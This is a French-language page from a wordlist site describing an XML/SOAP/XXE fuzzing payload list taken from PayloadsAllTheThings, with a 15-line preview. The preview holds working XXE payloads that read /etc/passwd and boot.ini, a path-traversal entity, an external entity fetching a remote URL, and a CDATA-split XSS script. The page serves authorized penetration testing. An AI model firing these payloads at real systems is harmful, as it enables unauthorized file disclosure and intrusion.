Skip to content
cyberwordlists
Fuzzing8.0 KB

XML / SOAP Attack Payloads

Payloads d'attaque XML/SOAP/XXE : lectures de fichiers par entité SYSTEM externe, entités RFI, structures methodCall XML-RPC et vecteurs d'expansion d'entités.

Voir la source
Taille
8.0 KB
Catégorie
Fuzzing
Source
swisskyrepo/PayloadsAllTheThings
Licence
MIT
Outils recommandés
burpnucleiwfuzz

Aperçu

Les 15 premières entrées. Téléchargez ou copiez la liste complète (8.0 KB) avec les boutons ci-dessus.

>head xml-soap-attacks-patt.txt8.0 KB
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<!DOCTYPE foo [<!ENTITY xxe7eb97 SYSTEM "file:///etc/passwd"> ]>
<!DOCTYPE foo [<!ENTITY xxe7eb97 SYSTEM "file:///c:/boot.ini"> ]>
<!DOCTYPE foo [<!ENTITY xxe46471 SYSTEM "http://crowdshield.com/.testing/rfi_vuln.txt"> ]>
<?xml version="1.0"?><methodCall><methodName>demo.sayHello</methodName><params></params></methodCall>
<?xml version="1.0"?><change-log><text>Hello World</text></change-log>
<?xml version="1.0"?><change-log><text>&quot;Hello World&quot;</text></change-log>
<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"> ]><change-log><text>Hello &myEntity;</text></change-log>
<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"><!ENTITY myQuote "&quot;"> ]><change-log><text>&myQuote;Hello &myEntity;&myQuote;</text></change-log>
<!ENTITY systemEntity SYSTEM "robots.txt">
<change-log> <text>&systemEntity;</text> </change-log>
<?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "robots.txt"> ]> <change-log> <text>&systemEntity;</text> </change-log>
<?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "../../../../boot.ini"> ]> <change-log> <text>&systemEntity;</text> </change-log>
<?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "robots.txt"> ]> <change-log> <text>&systemEntity;</text>; </change-log>
<test> $lDOMDocument->textContent=<![CDATA[<]]>script<![CDATA[>]]>alert('XSS')<![CDATA[<]]>/script<![CDATA[>]]> </test>

Payloads d'attaque XML/SOAP/XXE : lectures de fichiers par entité SYSTEM externe, entités RFI, structures methodCall XML-RPC et vecteurs d'expansion d'entités.

Cette liste est orientée vers le fuzzing d'entrées et la découverte de vulnérabilités. Elle pèse environ 8,0 Ko et s'utilise bien avec des outils tels que burp, nuclei, wfuzz. Choisissez la plus petite liste adaptée à votre mission : les listes plus courtes sont plus rapides et plus discrètes pour les attaques en ligne, tandis que les listes plus volumineuses offrent une couverture plus large pour le travail hors ligne, où la vitesse est une contrainte moindre.

Vous pouvez copier l'aperçu d'exemple directement depuis cette page, copier la liste entière dans le presse-papiers, ou télécharger le fichier .txt brut. La liste complète est servie directement depuis sa source d'origine sur GitHub.

Provenant de swisskyrepo/PayloadsAllTheThings et distribuée sous licence MIT. N'utilisez les wordlists que contre des systèmes que vous êtes explicitement autorisé à tester.